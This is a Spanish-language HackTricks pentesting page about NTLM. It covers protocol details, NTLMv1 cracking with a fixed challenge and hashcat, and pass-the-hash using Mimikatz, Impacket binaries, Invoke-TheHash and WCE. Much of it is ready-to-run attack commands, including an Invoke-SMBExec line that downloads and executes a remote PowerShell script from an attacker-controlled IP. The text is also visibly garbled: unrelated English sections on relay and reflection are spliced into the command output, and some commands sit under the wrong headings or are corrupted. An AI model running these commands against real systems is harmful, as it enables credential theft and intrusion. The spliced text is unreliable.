21 KiB
NTLM
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Obtén la ropa oficial de PEASS & HackTricks
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
Información Básica
En entornos donde se utilizan Windows XP y Server 2003, se emplean los hashes LM (Lan Manager), aunque es ampliamente reconocido que estos pueden ser comprometidos fácilmente. Un hash LM particular, AAD3B435B51404EEAAD3B435B51404EE
, indica un escenario donde no se utiliza LM, representando el hash para una cadena vacía.
Por defecto, el protocolo de autenticación Kerberos es el método principal utilizado. NTLM (NT LAN Manager) interviene en circunstancias específicas: ausencia de Active Directory, inexistencia del dominio, mal funcionamiento de Kerberos debido a una configuración incorrecta, o cuando se intentan conexiones utilizando una dirección IP en lugar de un nombre de host válido.
La presencia del encabezado "NTLMSSP" en los paquetes de red señala un proceso de autenticación NTLM.
Se facilita el soporte para los protocolos de autenticación - LM, NTLMv1 y NTLMv2 - mediante una DLL específica ubicada en %windir%\Windows\System32\msv1\_0.dll
.
Puntos Clave:
- Los hashes LM son vulnerables y un hash LM vacío (
AAD3B435B51404EEAAD3B435B51404EE
) indica que no se está utilizando. - Kerberos es el método de autenticación predeterminado, con NTLM utilizado solo bajo ciertas condiciones.
- Los paquetes de autenticación NTLM son identificables por el encabezado "NTLMSSP".
- Los protocolos LM, NTLMv1 y NTLMv2 son compatibles con el archivo del sistema
msv1\_0.dll
.
LM, NTLMv1 y NTLMv2
Puedes verificar y configurar qué protocolo se utilizará:
GUI
Ejecuta secpol.msc -> Políticas locales -> Opciones de seguridad -> Seguridad de red: Nivel de autenticación de LAN Manager. Hay 6 niveles (del 0 al 5).
Registro
Esto establecerá el nivel 5:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
Posibles valores:
0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM
Esquema básico de autenticación de dominio NTLM
- El usuario introduce sus credenciales
- La máquina cliente envía una solicitud de autenticación enviando el nombre de dominio y el nombre de usuario
- El servidor envía el reto
- El cliente cifra el reto usando el hash de la contraseña como clave y lo envía como respuesta
- El servidor envía al controlador de dominio el nombre de dominio, el nombre de usuario, el reto y la respuesta. Si no hay un Directorio Activo configurado o el nombre de dominio es el nombre del servidor, las credenciales se verifican localmente.
- El controlador de dominio verifica si todo es correcto y envía la información al servidor
El servidor y el controlador de dominio pueden crear un Canal Seguro a través del servidor Netlogon ya que el controlador de dominio conoce la contraseña del servidor (está dentro de la base de datos NTDS.DIT).
Esquema de autenticación NTLM local
La autenticación es como la mencionada anteriormente pero el servidor conoce el hash del usuario que intenta autenticarse dentro del archivo SAM. Entonces, en lugar de preguntar al controlador de dominio, el servidor verificará por sí mismo si el usuario puede autenticarse.
Desafío NTLMv1
La longitud del desafío es de 8 bytes y la respuesta tiene una longitud de 24 bytes.
El hash NT (16 bytes) se divide en 3 partes de 7 bytes cada una (7B + 7B + (2B+0x00*5)): la última parte se llena con ceros. Luego, el desafío se cifra por separado con cada parte y los bytes cifrados resultantes se unen. Total: 8B + 8B + 8B = 24 bytes.
Problemas:
- Falta de aleatoriedad
- Las 3 partes pueden ser atacadas por separado para encontrar el hash NT
- DES es crackeable
- La 3ª clave está compuesta siempre por 5 ceros.
- Dado el mismo desafío la respuesta será la misma. Por lo tanto, puedes dar como desafío a la víctima la cadena "1122334455667788" y atacar la respuesta usando tablas arcoíris precalculadas.
Ataque NTLMv1
Actualmente es menos común encontrar entornos con Delegación sin Restricciones configurada, pero esto no significa que no puedas abusar de un servicio de Cola de Impresión configurado.
Podrías abusar de algunas credenciales/sesiones que ya tengas en el AD para solicitar a la impresora que se autentique contra algún host bajo tu control. Luego, utilizando metasploit auxiliary/server/capture/smb
o responder
puedes establecer el desafío de autenticación en 1122334455667788, capturar el intento de autenticación y, si se realizó utilizando NTLMv1, podrás crackearlo.
Si estás utilizando responder
, podrías intentar **usar la bandera --lm
** para intentar degradar la autenticación.
Ten en cuenta que para esta técnica la autenticación debe realizarse utilizando NTLMv1 (NTLMv2 no es válido).
Recuerda que la impresora utilizará la cuenta de equipo durante la autenticación, y las cuentas de equipo utilizan contraseñas largas y aleatorias que probablemente no podrás crackear utilizando diccionarios comunes. Pero la autenticación NTLMv1 utiliza DES (más información aquí), por lo que utilizando algunos servicios especialmente dedicados a crackear DES podrás crackearlo (podrías usar https://crack.sh/ por ejemplo).
Ataque NTLMv1 con hashcat
NTLMv1 también se puede romper con la Herramienta Multi NTLMv1 https://github.com/evilmog/ntlmv1-multi que formatea los mensajes NTLMv1 de una manera que puede ser rota con hashcat.
El comando
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
NTLM Relay Attack
Introduction
In a Windows environment, NTLM (NT LAN Manager) is a suite of security protocols used for authentication. NTLM relay attack is a common technique used by hackers to intercept and relay NTLM authentication traffic to gain unauthorized access to a target system.
How it Works
- The attacker intercepts NTLM authentication traffic between a client and a server.
- The attacker relays the captured authentication data to another system, tricking it into thinking the attacker is the legitimate user.
- The attacker can then access the target system using the compromised credentials.
Mitigation
To prevent NTLM relay attacks, consider implementing the following measures:
- Enforce SMB Signing: Require SMB signing to prevent tampering with authentication traffic.
- Use LDAP Signing and Channel Binding: Enable LDAP signing and channel binding to protect against relay attacks.
- Enable Extended Protection for Authentication: This adds an extra layer of security to prevent NTLM relay attacks.
By implementing these measures, you can enhance the security of your Windows environment and protect against NTLM relay attacks.
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595
To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
NTLM Relaying
Introduction
NTLM relaying is a technique used to relay authentication attempts from one system to another, allowing an attacker to impersonate a legitimate user and gain unauthorized access to resources on a network.
Description
NTLM relaying takes advantage of the way NTLM authentication works in Windows environments. When a user attempts to authenticate to a server using NTLM, the server sends a challenge to the client, which the client must encrypt using its password hash and send back to the server. An attacker can intercept this challenge/response process and relay it to another server, effectively tricking that server into thinking the attacker is the legitimate user.
Usage
NTLM relaying can be performed using tools like Responder
or Mimikatz
to capture authentication attempts and relay them to other systems on the network. This can be particularly effective in environments where NTLM authentication is used extensively and where servers trust each other implicitly.
Mitigation
To mitigate the risk of NTLM relaying attacks, it is recommended to implement protections such as:
- Enabling SMB signing to prevent tampering with authentication traffic
- Implementing Extended Protection for Authentication to prevent relaying attacks
- Disabling NTLM authentication in favor of more secure protocols like Kerberos
By taking these steps, organizations can reduce the risk of NTLM relaying attacks and better protect their network resources.
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
Ejecuta hashcat (es mejor distribuido a través de una herramienta como hashtopolis) ya que de lo contrario tomará varios días.
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
En este caso sabemos que la contraseña es password, por lo que vamos a hacer trampa con fines de demostración:
python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d
echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand
Ahora necesitamos usar las utilidades de hashcat para convertir las claves DES descifradas en partes del hash NTLM:
./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1
./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2
Finalmente, la última parte:
./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
586c # this is the last part
Windows Hardening: NTLM
NTLM Relay Attack
Description
The NTLM relay attack is a common technique used by attackers to intercept and relay NTLM authentication traffic to gain unauthorized access to a target system. This attack can be executed by capturing NTLM authentication requests and forwarding them to another system, tricking it into believing the attacker's machine is the legitimate user.
Mitigation
To mitigate NTLM relay attacks, it is recommended to implement SMB signing, enable Extended Protection for Authentication, and disable NTLM where possible. Additionally, enforcing the use of Kerberos authentication can help prevent NTLM relay attacks.
NTLM Reflection Attack
Description
The NTLM reflection attack is a type of attack where an attacker sends a malicious NTLM authentication request to a target server, which then reflects the request back to the attacker. This can be used to gather information about the target system or to launch further attacks.
Mitigation
To mitigate NTLM reflection attacks, it is important to disable NTLMv1, as it is vulnerable to reflection attacks. Implementing SMB signing and enabling Extended Protection for Authentication can also help protect against NTLM reflection attacks. Additionally, monitoring network traffic for suspicious activity can aid in detecting and preventing such attacks.
NTHASH=b4b9b02e6f09a9bd760f388b6700586c
Desafío NTLMv2
El largo del desafío es de 8 bytes y se envían 2 respuestas: Una tiene una longitud de 24 bytes y la longitud de la otra es variable.
La primera respuesta se crea cifrando usando HMAC_MD5 la cadena compuesta por el cliente y el dominio y utilizando como clave el hash MD4 del hash NT. Luego, el resultado se utilizará como clave para cifrar usando HMAC_MD5 el desafío. A esto se le añadirá un desafío del cliente de 8 bytes. Total: 24 B.
La segunda respuesta se crea utilizando varios valores (un nuevo desafío del cliente, una marca de tiempo para evitar ataques de repetición...)
Si tienes un pcap que ha capturado un proceso de autenticación exitoso, puedes seguir esta guía para obtener el dominio, nombre de usuario, desafío y respuesta e intentar descifrar la contraseña: https://research.801labs.org/cracking-an-ntlmv2-hash/
Pasar el Hash
Una vez que tengas el hash de la víctima, puedes usarlo para hacerte pasar por ella.
Necesitas utilizar una herramienta que realizará la autenticación NTLM usando ese hash, o podrías crear un nuevo inicio de sesión de sesión e inyectar ese hash dentro del LSASS, para que cuando se realice cualquier autenticación NTLM, se utilice ese hash. La última opción es lo que hace mimikatz.
Por favor, recuerda que también puedes realizar ataques de Pasar el Hash utilizando cuentas de Computadora.
Mimikatz
Debe ejecutarse como administrador
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
Esto lanzará un proceso que pertenecerá a los usuarios que hayan iniciado mimikatz, pero internamente en LSASS, las credenciales guardadas son las que están dentro de los parámetros de mimikatz. Luego, puedes acceder a recursos de red como si fueras ese usuario (similar al truco runas /netonly
pero sin necesidad de conocer la contraseña en texto plano).
Pass-the-Hash desde Linux
Puedes obtener ejecución de código en máquinas Windows usando Pass-the-Hash desde Linux.
Accede aquí para aprender cómo hacerlo.
Herramientas compiladas de Impacket para Windows
Puedes descargar binarios de Impacket para Windows aquí.
- psexec_windows.exe
C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
- wmiexec.exe
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
- atexec.exe (En este caso necesitas especificar un comando, cmd.exe y powershell.exe no son válidos para obtener una shell interactiva)
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
- Hay varios binarios de Impacket más...
Invoke-TheHash
Puedes obtener los scripts de PowerShell desde aquí: https://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-SMBExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-WMIExec
Invocar-WMIExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-SMBClient
Invocar-SMBClient
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
Invoke-SMBEnum
Invocar-SMBEnum
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
Invoke-TheHash
Esta función es una combinación de todas las demás. Puedes pasar varios hosts, excluir algunos y seleccionar la opción que deseas utilizar (SMBExec, WMIExec, SMBClient, SMBEnum). Si seleccionas cualquiera de SMBExec y WMIExec pero no proporcionas ningún parámetro de Comando, simplemente verificará si tienes permisos suficientes.
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
Evil-WinRM Pass the Hash
Editor de Credenciales de Windows (WCE)
Debe ejecutarse como administrador
Esta herramienta hará lo mismo que mimikatz (modificar la memoria de LSASS).
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
Ejecución remota manual de Windows con nombre de usuario y contraseña
{% content-ref url="../lateral-movement/" %} lateral-movement {% endcontent-ref %}
Extracción de credenciales de un host de Windows
Para obtener más información sobre cómo obtener credenciales de un host de Windows, deberías leer esta página.
NTLM Relay y Responder
Lee una guía más detallada sobre cómo realizar estos ataques aquí:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {% endcontent-ref %}
Analizar desafíos NTLM desde una captura de red
Puedes utilizar https://github.com/mlgualtieri/NTLMRawUnHide
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el oficial PEASS & HackTricks swag
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.